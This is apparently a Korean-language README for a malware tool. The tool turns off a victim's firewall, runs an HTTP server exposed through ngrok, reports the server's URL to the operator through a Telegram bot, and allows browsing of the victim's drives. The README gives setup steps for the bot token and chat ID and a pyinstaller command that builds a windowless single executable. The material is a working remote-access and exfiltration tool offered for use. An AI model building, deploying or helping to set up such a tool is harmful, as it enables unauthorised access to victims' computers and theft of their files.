
이 간단하지만 강력한 스크립트는 방화벽을 끄고, HTTP 서버를 시작하고, ngrok을 통해 포트를 포워딩하고, Telegram 봇을 통해 서버의 URL을 전송하는 새로운 유형의 악성코드를 소개합니다.
이 간단한 스크립트는 방화벽을 끄고, HTTP 서버를 시작하고, ngrok을 통해 포트를 전달하고, Telegram 봇을 통해 서버의 URL을 전송하는 새로운 유형의 악성코드를 소개합니다.
새로운 Telegram BOT을 만들어야 합니다. 여기의 단계를 따라 하나를 만드세요⚡
이 프로그램을 실행하기 전에 payload.py 파일을 편집하세요.
"botttoken"을 당신의 Telegram Bot API 키로 교체하세요.
"chatid"를 당신의 Telegram Bot의 Chat ID로 교체하세요.
# Install dependencies
$ python3 , pip
$ py -3 -m pip install -r requirements.txt
# in order to change the drive you accesing use this parameter change_drive?drive=$Drive
# Building the payload
$ Replace the bot token And Chatid Cred in the file
$ Now compile the payload code using pyinstaller
$ pyinstaller --noconfirm --onefile --windowed payload.py